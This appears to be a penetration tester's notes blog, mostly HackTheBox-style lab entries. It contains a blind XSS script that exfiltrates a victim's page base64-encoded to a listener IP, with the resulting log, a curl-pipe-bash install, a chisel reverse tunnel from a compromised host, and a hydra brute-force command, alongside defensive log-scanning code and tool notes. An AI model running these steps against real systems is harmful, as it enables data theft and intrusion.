Saturday, 13 March 2021

Blind XSS Data Exfiltration

cat 2.js

// Script fetched by the injected payload: read the report page inside the victim's
// browser session, then send it out base64-encoded as a GET to the listener.
var xhr=new XMLHttpRequest();
xhr.open("GET", 'http://gym-club.htb/security_threat/report.php', false);   // synchronous request
xhr.send();
var xhr2=new XMLHttpRequest();
// btoa() output keeps '+', '/' and '=' unescaped, so the blob shows up raw in the listener's access log
xhr2.open("GET", "http://10.10.14.121/aaaa?=" + btoa(xhr.responseText), false);
xhr2.send();


└─# python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.208 - - [13/Mar/2021 11:54:48] "GET /2.js HTTP/1.1" 200 -
10.10.10.208 - - [13/Mar/2021 11:54:48] code 404, message File not found
10.10.10.208 - - [13/Mar/2021 11:54:48] "GET /aaaa?=PCFET0NUWVBFIGh0bWw+CjxodG1sPgo8aGVhZD4KICA8dGl0bGU+U2VjdXJpdHkgUmVwb3J0PC90aXRsZT4KICA8c3R5bGU+CiAgICB0YWJsZSwgdGgsIHRkIHsKICAgICAgYm9yZGVyOiAxcHggc29saWQgYmxhY2s7CiAgICB9CiAgPC9zdHlsZT4KPC9oZWFkPgo8Ym9keT4KPGg0PkxvZ2dlZCBYU1MgYXR0ZW1wdHM8L2g0Pgo8dGFibGU+CiAgPHRoZWFkPgogICAgPHRyPgogICAgICA8dGQ+VGltZXN0YW1wPC90ZD4KICAgICAgPHRkPlVzZXIgQWdlbnQ8L3RkPgogICAgICA8dGQ+SVAgQWRkcmVzczwvdGQ+CiAgICA8L3RyPgogIDwvdGhlYWQ+Cjx0Ym9keT4KPC90Ym9keT4KPC9ib2R5Pgo8L2h0bWw+Cg== HTTP/1.1" 404 -
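The exfiltration above leaves its trace in the receiving server's access log, and the same trace is what a blue team looks for in its own web logs. As an added defender-side example (not code from this post), a small Python scanner that pulls base64-encoded query values out of access-log lines of this format and decodes them; the log lines and the stolen page are constructed, with a short stand-in for the real blob.

```python
import base64
import binascii
import re
from urllib.parse import unquote

# Request line of a python3 -m http.server access log (also fits common/combined log format).
LOG_RE = re.compile(r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>[A-Z]+) (?P<target>\S+)(?: HTTP/[\d.]+)?" (?P<status>\d{3})')

def query_values(target):
    """Yield (name, value) pairs from the query string. parse_qsl() is avoided on purpose:
    it turns '+' into ' ', which corrupts btoa() output ('+', '/', '=' are all legal base64)."""
    for pair in target.partition("?")[2].split("&"):
        if pair:
            name, _, value = pair.partition("=")
            yield unquote(name), unquote(value)

def try_base64_text(value, min_len=16):
    """Decode value if it is valid base64 holding mostly printable text; otherwise return None."""
    if len(value) < min_len or len(value) % 4:
        return None
    try:
        text = base64.b64decode(value, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None
    printable = sum(ch.isprintable() or ch in "\r\n\t" for ch in text)
    return text if printable / len(text) > 0.95 else None

def find_exfil(log_lines):
    """Return (source_ip, timestamp, param_name, decoded_text) for every base64 query value found."""
    findings = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # e.g. the 'code 404, message File not found' lines http.server emits
        for name, value in query_values(m["target"]):
            text = try_base64_text(value)
            if text is not None:
                findings.append((m["src"], m["ts"], name, text))
    return findings

# Constructed sample log: the exfil pattern from the post with a short stand-in for the stolen page
# re-encoded here instead of copying the real blob; the third line is an ordinary request.
STOLEN_PAGE = "<!DOCTYPE html>\n<html>\n<body>\n<h4>Logged XSS attempts</h4>\n</body>\n</html>\n"
SAMPLE_LOG = [
    '10.10.10.208 - - [13/Mar/2021 11:54:48] "GET /2.js HTTP/1.1" 200 -',
    '10.10.10.208 - - [13/Mar/2021 11:54:48] "GET /aaaa?=%s HTTP/1.1" 404 -'
    % base64.b64encode(STOLEN_PAGE.encode()).decode(),
    '10.10.10.208 - - [13/Mar/2021 11:55:02] "GET /search?q=hello+world HTTP/1.1" 200 -',
]
```

Running find_exfil(SAMPLE_LOG) yields one finding, the decoded report page, while the ordinary search request is left alone; pointing it at a real access log is a matter of feeding the file's lines in.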

Sunday, 14 February 2021

New Cheatsheet XSS 2021

https://netsec.expert/posts/xss-in-2021/

Monday, 25 January 2021

TCP/UDP reverse tunnel, transported over HTTP, secured via SSH - chisel

#### CHISEL INSTALL

curl https://i.jpillora.com/chisel! | bash

## copy to victim server: 
www-data@passage:/tmp$ wget http://10.10.14.143/chisel
wget http://10.10.14.143/chisel
--2021-01-25 08:55:34--  http://10.10.14.143/chisel
Connecting to 10.10.14.143:80... failed: Connection refused.
www-data@passage:/tmp$ wget http://10.10.14.143:8000/chisel
wget http://10.10.14.143:8000/chisel
--2021-01-25 08:55:47--  http://10.10.14.143:8000/chisel
Connecting to 10.10.14.143:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 8704000 (8.3M) [application/octet-stream]
Saving to: 'chisel'

chisel              100%[===================>]   8.30M  5.33MB/s    in 1.6s    

2021-01-25 08:55:49 (5.33 MB/s) - 'chisel' saved [8704000/8704000]

www-data@passage:/tmp$ 


##  my computer:
chisel server -p 9999 --reverse

## victim computer 
./chisel client 10.10.14.143:9999 R:631:localhost:631

##############



hydra -l paul -P /usr/share/wordlists/rockyou.txt -s 631 -f 127.0.0.1 http-get /admin/log/error_log

Red Team Notes 2.0

https://dmcxblue.gitbook.io/red-team-notes-2-0/

Friday, 18 December 2020

intercept http2 (grpc) in BURP SUITE PROXY

as root:

iptables -t nat -A OUTPUT -p tcp -m owner ! --uid-owner mitmproxyuser -d 18.159.107.117 -j REDIRECT --to-port 8080

adduser mitmproxyuser

(the user has to exist before the iptables rule is added: the owner match resolves the --uid-owner name when the rule is inserted, and an unknown name is rejected)


cat /etc/nghttpx/nghttpx.conf   (downstream config)

frontend=0.0.0.0,8080;no-tls
backend=127.0.0.1,8081;;proto=http/1.1
backend-keep-alive-timeout=5m
frontend-http2-read-timeout=5m
frontend-read-timeout=5m
frontend-write-timeout=5m
stream-read-timeout=5m
stream-write-timeout=5m
backend-read-timeout=5m
backend-write-timeout=5m
backend-connect-timeout=5m
listener-disable-timeout=5m
backend-http2-window-size=134217720
backend-http2-connection-window-size=1073741760
frontend-http2-window-size=134217720
frontend-http2-connection-window-size=1073741760
http2-proxy=no
private-key-file=/etc/nghttpx/server.key
certificate-file=/etc/nghttpx/server.crt
cacert=/etc/nghttpx/ca.crt
accesslog-syslog=yes
errorlog-syslog=yes
workers=5


cat /etc/nghttpx/upstream.conf   (upstream config)

frontend=127.0.0.1,8082;no-tls
backend=vendor-IP,28900;;no-tls;proto=h2
backend-keep-alive-timeout=5m
frontend-http2-read-timeout=5m
frontend-read-timeout=5m
frontend-write-timeout=5m
stream-read-timeout=5m
stream-write-timeout=5m
backend-read-timeout=5m
backend-write-timeout=5m
backend-connect-timeout=5m
listener-disable-timeout=5m
http2-proxy=no
accesslog-syslog=yes
errorlog-syslog=yes
workers=5


run nghttpx as root:

┌──(root💀kali)-[/etc/nghttpx]
└─# nghttpx
2020-12-18T14:38:21.383+01:00 8777 8777 99aaafb4 NOTICE (shrpx.cc:2882) Loading configuration from /etc/nghttpx/nghttpx.conf


run burp suite proxy 127.0.0.1:8081 (invisible proxy)

USER OPTIONS -> Upstream proxy add 127.0.0.1:8082


as mitmproxyuser:

┌──(mitmproxyuser㉿kali)-[/etc/nghttpx]
└─$ nghttpx --conf upstream.conf
2020-12-18T14:42:00.364+01:00 9293 9293 59e630c7 NOTICE (shrpx.cc:2882) Loading configuration from upstream.conf



as root:

run python code (client http2)











Forward local connections to local BURP PROXY / MITM PROXY

0) sysctl -w net.ipv4.ip_forward=1
   sysctl -w net.ipv6.conf.all.forwarding=1
   sysctl -w net.ipv4.conf.all.send_redirects=0

1) iptables -t nat -A OUTPUT -p tcp -m owner ! --uid-owner mitmproxyuser -d dst_ip -j REDIRECT --to-port 8080

2) useradd --create-home mitmproxyuser
   (create the user before adding the rule in step 1: iptables resolves the --uid-owner name at insert time, so the rule is refused while the user does not exist; the "! --uid-owner" exclusion is what keeps the proxy's own outgoing connections from being redirected back into itself)

3) xhost +

4) sudo -u mitmproxyuser -H bash -c "export DISPLAY=:0.0;java -jar /usr/bin/burpsuite"

or

4) sudo -u mitmproxyuser -H bash -c "export DISPLAY=:0.0;mitmproxy"


Thursday, 17 December 2020

Virtualbox + 4k (3840x2160) resolution on guest

PS C:\Program Files\Oracle\VirtualBox> .\VBoxManage.exe setextradata global GUI/MaxGuestResolution "3840,2160"
PS C:\Program Files\Oracle\VirtualBox> .\VBoxManage.exe getextradata global GUI/MaxGuestResolution
Value: 3840,2160
PS C:\Program Files\Oracle\VirtualBox> .\VBoxManage.exe setextradata "Kali" GUI/LastGuestSizeHint "3840,2160"

Wednesday, 16 September 2020

How to parse ffuf output file

ffuf -o output_file

cat output_file | jq -c '.results[] | {url:.url,status: .status}'

for file in dirb/*; do cat $file | jq -c '.results[] | {url:.url,status: .status}'; done
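The same parsing in Python, as an added example that is not from the post: it reads the JSON ffuf writes by default with -o (-of json), reproduces the jq projection, and then goes one step further than the one-liner by dropping hits whose response length repeats, which is the usual sign of a catch-all page. The ffuf output and the target URLs are constructed; only url, status and length fields are used.

```python
import json
from collections import Counter

# Constructed ffuf JSON output: the fields the jq filter above uses, plus 'length',
# which the catch-all filter below needs. Real output carries more fields per result.
FFUF_JSON = json.dumps({"results": [
    {"url": "http://target.example/admin",  "status": 301, "length": 178},
    {"url": "http://target.example/backup", "status": 200, "length": 4021},
    {"url": "http://target.example/abc123", "status": 200, "length": 1337},
    {"url": "http://target.example/xyz789", "status": 200, "length": 1337},
    {"url": "http://target.example/qwerty", "status": 200, "length": 1337},
]})

def parse_ffuf(text):
    """Same projection as jq '.results[] | {url:.url,status:.status}', keeping length as well."""
    return [{"url": r["url"], "status": r["status"], "length": r.get("length")}
            for r in json.loads(text)["results"]]

def drop_catchall(results, min_repeats=3):
    """Remove hits whose response length occurs min_repeats times or more: a server that
    answers every unknown path with the same page (soft 404) produces exactly that pattern."""
    counts = Counter(r["length"] for r in results)
    common = {length for length, n in counts.items() if n >= min_repeats}
    return [r for r in results if r["length"] not in common]

def by_status(results):
    """Group URLs by status code, the way the jq output is usually read by eye."""
    groups = {}
    for r in results:
        groups.setdefault(r["status"], []).append(r["url"])
    return groups
```

ffuf can do the same length-based filtering at scan time with its -ac auto-calibration option; this post-processing is for output files that were collected without it.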